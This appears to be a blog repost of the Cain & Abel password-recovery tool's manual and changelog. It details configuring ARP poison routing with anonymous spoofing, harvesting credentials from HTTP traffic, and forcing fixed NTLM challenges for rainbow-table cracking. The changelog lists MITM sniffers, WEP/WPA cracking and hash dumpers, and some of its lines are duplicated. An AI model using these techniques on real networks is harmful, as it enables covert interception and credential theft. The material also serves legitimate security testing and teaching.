Cain & Abel is a password recovery tool for Microsoft Operating Systems. It allows easy recovery of several kind of passwords by sniffing the network, cracking encrypted passwords using Dictionary, Brute-Force and Cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analyzing routing protocols.
The program does not exploit any software vulnerabilities or bugs that could not be fixed with little effort. It covers some security aspects/weakness intrinsic of protocol's standards, authentication methods and caching mechanisms; its main purpose is the simplified recovery of passwords and credentials from various sources, however it also ships some "non standard" utilities for Microsoft Windows users.
Cain & Abel has been developed in the hope that it will be useful for network administrators, teachers, security consultants/professionals, forensic staff, security software vendors, professional penetration testers and everyone else that plans to use it for ethical reasons. The author will not help or support any illegal activity done with this program.
Be warned that there is the possibility that you will cause damages and/or loss of data using this software and that in no events shall the author be liable for such damages or loss of data. Please carefully read the License Agreement included in this manual before using the program.
Configuration
Cain & Abel requires the configuration of some parameters; everything can be set from the main configuration dialog.
Sniffer Tab
Here you can set the network card to be used by Cain's sniffer and APR features. The last two check boxes enable/disables these functions at the program's startup.
The sniffer is compatible with Winpcap drivers of version 2.3 or later and in this version only Ethernet adapters are supported by the program.
APR Tab
This is where you can configure APR (Arp Poison Routing). Cain uses a separate thread that sends ARP Poison packets to victim hosts every 30 seconds by default. This is necessary because entries present in the ARP cache of remote machines can be flushed out in case of no traffic. From this dialog you can set the time between each ARP Poison storm: setting this parameter to few seconds will cause a lot of ARP network traffic while setting it for long delays could not produce the desired traffic hijacking.
The spoofing options define the addresses that Cain writes into the Ethernet, ARP headers of ARP Poison Packets and re-routed packets. In this case the ARP Poison attack will be completely anonymous because the attacker's real MAC an IP addresses are never sent on the network.
If you want to enable this option you must consider that:
-
Ethernet address spoofing can be used only if the attacker's workstation is connected to a HUB or to a network switch that does not use the "Port Security" feature. If "Port Security" is enabled on the switch, the source MAC address contained in every ethernet frame is checked against a list of allowed MAC addresses set on the switch. If the spoofing MAC address is not in this list the switch will disable the port and you will loose connectivity.
-
The spoofing IP address must be a free address of your subnet. The ARP protocol does not cross routers or VLANs so if you set a spoofing IP that is out of your subnet the remote host will reply to it's default gateway and you will not see its responses. Also if you use a spoofing IP address that is already used in your subnet there will be an "IP address conflict" and the attack will be easily noticed. Here are some examples of valid spoofing addresses:
|
Real IP address |
Subnet Mask |
Valid range for the spoofing IP address |
|
192.168.0.1 |
255.255.255.0 |
Must be an unused address in the range 192.168.0.2 - 192.168.0.254 |
|
10.0.0.1 |
255.255.0.0 |
Must be an unused address in the range 10.0.0.2 - 10.0.255.254 |
|
172.16.0.1 |
255.255.255.240 |
Must be an unused address in the range 172.16.0.2 - 172.16.0.14 |
|
200.200.200.1 |
255.255.255.252 |
Must be an unused address in the range 200.200.200.2 - 200.200.200.3 |
The spoofing IP address is automatically checked by the program when you press the "Apply" button, if the address is already in use in the subnet a message box will report the problem.
-
The spoofing MAC address must not be present in your subnet. The presence of two identical MAC addresses on the same Layer-2 LAN can cause switches convergence problems; for this reason I decided to not let you easily set the spoofing MAC of your choice from the configuration dialog. The default value is set to 001122334455 which is an invalid address not supposed to exist in your network and that at the same time can be easily identified for troubleshooting. IMPORTANT ! You cannot have, on the same Layer-2 network, two or more Cain machines using APR's MAC spoofing and the same Spoofed MAC address. The spoofing MAC address can be changed modifying the registry value "SpoofMAC" at this location: "HKEY_CURRENT_USER\Software\Cain\Settings".
Filters and Ports Tab
Here you can enable/disable Cain's sniffer filters and application protocol TCP/UDP ports. Cain captures only authentication information not the entire content of each packet, however you can use the Telnet filter to dump, into a file, all the data present in a TCP session, modifying the relative filter port.
Cain's sniffer filters are internally designed to survive in an unreliable world such as a network under ARP Poison attack; Cain uses different state machines to extract from network packets all the information needed to recover the plaintext form of a transmitted password. Some authentication protocols uses a challenge-response mechanism so it needs to collect parameters from Client->Server and Server->Client traffic; traffic interception in both directions is always possible if your Level-2 network is made by HUBs only or if you are connected to a mirror port on the switch but on switched networks in general, it can be achieved only using some kind of traffic hijacking technique such as Arp Poison Routing (APR). If you are sniffing with APR enabled, the sniffer will extract challenge-response authentications only if you reach a Full-Routing state between victim computers.
Under this tab you can also enable/disable the analysis of routing protocols (HSRP, VRRP, EIGRP, OSPF, RIPv1, RIPv2) and the APR-DNS feature that acts as a DNS Reply Rewriter.
HTTP Fields Tab
This tab contains a list of user name and password fields to be used by the HTTP sniffer filter. Cookies and HTML Forms that travel in HTTP packets are examined in this way: for each user name field all the password fields are checked and if these two parameters are found, the credentials will be captured and displayed on the screen.
The following cookie uses the fields "logonusername=" and "userpassword=" for authentication purposes; if you don't include these two fields in the above list the sniffer will not extract relative credentials.
GET /mail/Login?domain=xxxxxx.xx&style=default&plain=0 HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, */*
Referer: http://xxx.xxxxxxx.xx/xxxxx/xxxx
Accept-Language: it
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; (R1 1.3); .NET CLR 1.1.4322)
Host: xxx.xxxxxx.xx
Connection: Keep-Alive
Cookie: ss=1; ss=1; srclng=it; srcdmn=it; srctrg=_blank; srcbld=y; srcauto=on; srcclp=on; srcsct=web; ; video=c1; TEMPLATE=default;
Traceroute Tab
This is used to configure Cain's ICMP/UDP/TCP traceroute. You can set to resolve host names, use ICMP Mask discovery and enable/disable WHOIS information extraction for each hop.
Challenge Spoofing Tab
Here you can set the custom challenge value to rewrite into NTLM authentications packets. This feature can be enabled quickly from Cain's toolbar and must be used with APR. A fixed challenge enables cracking of NTLM hashes captured on the network by mean of RainbowTables.
Sniffer APR
Cain & Abel - Changelog
What's new in Cain & Abel 4.9.31:
· SIPS Man-in-the-Middle Sniffer (TCP port 5061; successfully tested with Microsoft Office Communicator with chained certificates).
· Added support for RTP G726-64WB codec (Wengo speex replacement ) in VoIP sniffer.
· X509 certificate's extensions are now preserved in chained fake certificates generated by Certificate Collector.
· Extended ASCII characters support for SSID in Passive Wireless Scanner.
· Some bugs in Cain's Traceroute fixed.
What's new before Cain & Abel 4.9.30:
· Added support for the following codecs in VoIP sniffer: G722, Speex-16Khz, Speex-32Khz, AMR-NB, AMR-WB.
· Transmission rate fixed to 6Mbps in enumeration function of airpcap TX channels.
· Fixed a bug in all APR-SSL based sniffer filters to avoid 100% CPU utilization while forwarding data.
· Fixed a bug in Certificate Collector and automatic fake certificate generation (issuers with CN field instead of OU are now handled).
· Fixed a bug in PPPoE sniffer about CHAP-MD5 hashes incorrectly recognized as MS-CHAP hashes.
· OpenSSL library upgrade to version 0.9.8j.
· OUI List updated.
· Added channel hopping capability on A, BG and ABG channels in Passive Wireless Sniffer.
· Added support for A channels in Passive Wireless Sniffer.
· Added automatic detection of RX/TX ABG channels for AirPcap NX adapters.
· WEP ARP Injection thread now avoid sending packets to disassociated stations.
· Fixed a bug in visualization list of wireless clients (thanks: spino).
· Fixed a bug (program's crash) when starting the sniffer on wireless adapters (es Intel PRO/Wireless 3945ABG) using with Winpcap 4.x.
· Fixed a bug in WinRTgen about tables size visualization.
· AirPcap library upgrade to version 4.0.0 (to support the new AirPcap NX adapters from CACE Technologies).
· Winpcap library upgrade to version 4.1 beta 5.
· Automatic Certificate Collector for FTPS (implicit), IMAPS and POP3S protocols.
· FTPS Man-in-the-Middle Sniffer and password collector.
· POP3S Man-in-the-Middle Sniffer and password collector.
· IMAPS Man-in-the-Middle Sniffer and password collector.
· Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
· Added PTW WEP cracking attack.
· Added Windows Vista support in Wireless Password Decoder.
· Wireless Password Decoder now uses DLL injection under XP.
· Added Windows Mail (Vista) Password Decoder for POP3, IMAP, NNTP, SMTP and LDAP accounts.
· Added PTW WEP cracking attack.
· Added Windows Vista support in Wireless Password Decoder.
· Wireless Password Decoder now uses DLL injection under XP.
· Added PTW WEP cracking attack.
· Added Windows Vista support in Wireless Password Decoder.
· Wireless Password Decoder now uses DLL injection under XP.
· WPA-PSK (Dictionary and Brute-Force Attacks).
· WPA-PSK Auth (Dictionary and Brute-Force Attacks).
· WPA-PSK Authentications sniffer.
· WPA-PSK Hashes Cryptanalysis via Sorted Rainbow Tables.
· WPA-PSK RainbowTables have been added to Winrtgen v2.5.
· Added IE7 passwords support in Credential Manager Password Decoder.
· OpenSSL library upgrade to version 0.9.8e.
· WPA-PSK (Dictionary and Brute-Force Attacks).
· WPA-PSK Auth (Dictionary and Brute-Force Attacks).
· WPA-PSK Authentications sniffer.
· Added IE7 passwords support in Credential Manager Password Decoder.
· OpenSSL library upgrade to version 0.9.8e.
· WEP cracking speed up via wireless ARP requests injection (AirPcap USB adapter is needed). This feature has been successfully tested with Airpcap drivers v2.0 beta TX.
· Ability to deauthenticate client stations from Access Points.
· Added Windows Vista compatibility in NTLM Hashes Dumper, LSA Hashes Dumper and Syskey Dumper for hive files.
· - Added Ophcrack's RainbowTables support for NTLM Hashes Cryptanalysis attack.
· - MSCACHE Hashes Cryptanalysis via Sorted Rainbow Tables.
· - ORACLE Hashes Cryptanalysis via Sorted Rainbow Tables.
· - New RainbowTable types have been added to Winrtgen v2.0. "mscache" and "oracle" tables can be used against MSCACHE and ORACLE hashes for specific usernames that can be set in the configuration dialog.
· - Added Ophcrack's RainbowTables support for NTLM Hashes Cryptanalysis attack.
· - MSCACHE Hashes Cryptanalysis via Sorted Rainbow Tables.
· - ORACLE Hashes Cryptanalysis via Sorted Rainbow Tables.
· - New RainbowTable types have been added to Winrtgen v2.0. "mscache" and "oracle" tables can be used against MSCACHE and ORACLE hashes for specific usernames that can be set in the configuration dialog.
· Added hashes syncronization functions (Export/Import) to/from Cain for PocketPC via ActiveSync.
· Added VoIP sniffer support for the following codecs: G723.1, G726-16, G726-24, G726-32, G726-40, LPC-10.
· Added support for Winpcap v3.2.
다운로드 : http://www.oxid.it/cain.html
댓글